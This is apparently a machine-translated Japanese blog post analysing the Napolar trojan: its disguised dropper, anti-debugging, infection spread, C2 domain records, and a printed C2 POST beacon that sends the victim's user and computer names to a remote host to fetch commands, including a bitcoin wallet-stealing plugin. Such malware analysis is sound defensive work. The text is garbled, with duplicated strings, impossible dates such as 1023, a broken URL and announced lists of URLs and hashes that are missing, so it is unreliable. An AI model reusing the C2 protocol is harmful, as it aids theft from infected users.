blog

Win32/64-Napolar: ウェブ上で輝く新しいトロイの木馬

トロイの木馬については、そのプロセス間通信パイプラインの名前。同様の「」、「OPERA.DLL」、「trusteer」、「d...

Jul 18, 2025 · 4 min. read
シェア

Win32/64:Napolarトロイの木馬の場合、プロセス間通信パイプの名前は「 \pipe apSolar 」です。\CHROME.DLL」、「OPERA.DLL」、「trusteer」、「data_inject」などの文字列が存在します。DLL"、"OPERA.DLL"、"trusteer"、"data_inject "などの文字列や、後述する機能から、Solarbotと何らかの関係があると判断されました。以下、分析結果を見てみましょう。

ドロッパー

このファイルは最初、Photo_021-WWW.FACEBOOK.COM.exeのような名前の自己解凍型zipファイルとして存在し、ドロッパーの無言実行と、下のようなセクシーな女の子の写真の表示の2つのタスクを実行します:



コア実行ファイルの構造は以下の通りです:

最初のx86部分は、システムのアーキテクチャを識別するためにも使用されます。LDE64(Length Disassembly Engine)は、BeaEngine配下の32ビットベースの公式ツールで、32ビットおよび64ビットアーキテクチャの命令デコードが可能です。逆アセンブル作業は、システム機能の変更に不可欠です。

ウェブサイトで宣伝されているように、KERNEL32.DLL、NTDLL.DLL、WININET.DLL、SHLWAPI.DLL、PASPI.DLLの重要な関数はすべてCRC32ハッシュ化され、仮想フォームに格納されます。IsDebuggerPresent、OutputDebugString関数に関連するアンチデバッグのトリックもここに表現されています。%AppDatalsass.exeにインストールされると、新しく要求されたメモリ空間0xFE0000で実行が開始され、その後ボットはそれ自体をシャットダウンします。

このトロイの木馬に感染した領域の分布を理解するために、関連する検出セクションの動作を分析しました。その結果、少なくとも毎日数百台のコンピュータが感染しており、これは Solarbot の総サンプル数よりもわずかに多いことがわかりました。感染の影響を最も受けている地域は、中南米のコロンビア、ベネズエラ、ペルー、メキシコ、アルゼンチン、アジアのフィリピン、ベトナム、ヨーロッパのポーランドです。



プロトコル

ドメイン名:SOLARBOT.NET

レジストラ: NETEARTH ONE INC.

Whoisサーバー: whois.advancedregistrar.com

参照URL:http://..om

ネームサーバー: NS1.BITCOIN-DNS.COM

ネームサーバー: NS2.BITCOIN-DNS.COM

ステータス: clientTransferProhibited

更新日: 01-aug-1023

作成日: 01-aug-1023

有効期限: 01-aug-1024

登録データの連絡先情報はPRIVACYPROTECT.ORGの背後に隠されており、悪意のある活動に関与する多数のグループを引き寄せています。

実行コマンドを取得するためのHTTP POSTリクエストを以下に示します:

POST / HTTP/.1

Content-Type: application/x-www-form-urlencoded

ユーザーエージェント:Mozilla/4.0

ホスト: www.paloshke.org

コンテンツ長: 81

Pragma: no-cache

v=1.0&u=USER_NAME&c=COMP_NAME&s={7C79CE12-E753-D05E-0DE6-DFBF7B79CE12}&w=2.5.1&b=32

ここで、sは被害者の環境から取得し、その後生成されたRC4復号鍵を表し、vはボットのバージョンを表し、数字1.0はボットの初期開発段階を表します。

リクエストに成功すると、レスポンスを受信します。前述のように、これはRC4で暗号化され、暗号化されていない正しい鍵がPOSTクエリフィールドを介して送信されます。レスポンスの構造は 0 で分割された文字列の配列の形をしています。接続遅延の場合は秒数、ダウンロードコマンドの場合はファイルのURLアドレス、制御ハッシュ、復号化キー、0×2コマンドはビットコインウォレットを盗むプラグインである追加ファイルWalletSteal.binをインストールします。bitcoin.orgによると、ビットコインウォレットとはビットコインネットワークにおける物理的な財布に相当するもので、ユーザーがビットコイン取引で使用するための鍵が格納されています。実際、これはプラグインのサポートについて言われていることの一例です。プラグインの暗号化は%AppData内の一時ディレクトリSlrPluginに置かれます。

機能

ウェブサイトで紹介されている機能は以下の通りです:

FTPとPOP3のスキミング、逆Socks5または基本機能モジュールの実装が見られます。ブラウザからの攻撃の可能性を反映する関連文字列があります。実際、Cyberbanking Forumのコンテンツが暗号化されていない方法でC&Cサーバに送信されていることが判明しましたが、これはサイトがレピュテーションや証明書の検証を要求した場合にのみ発生しました。これは、以下の組み込みURLのリストに関連している可能性があります:

そして、内部コマンド 0xF を介してリモートで更新されます。

最後に、このボットが示す強力な悪意のある能力は、200ドルというリーズナブルな価格と相まって、近い将来拡散する可能性が高いと言わざるを得ません。幸いなことに、アンチウィルス・ソフトウェアが利用できるようになるため、この種のサイバー犯罪者が生き残るのはさらに難しくなるでしょう。

ソースコード

AVASTエンジンにおける選択されたサンプルとカバレッジのSHA256ハッシュ:

Read next

2013年最もホットなネットワーキング・テクノロジー

2013年、ネットワークは急激な変化を遂げました。様々なアプリケーションの大規模な爆発的な成長とIT技術、より良いアプリケーションと開発、SDN製品の出現、商用化に向けた100Gイーサネット、ネットワーク仮想化の段階的な成熟、そしてコンセプトとしてのみ存在した多くの技術もユーザの手に渡ることに成功しました。コンセプトとしてしか存在しなかった多くの技術も、ユーザーの手に渡ることに成功しました。

Jul 18, 2025 · 6 min read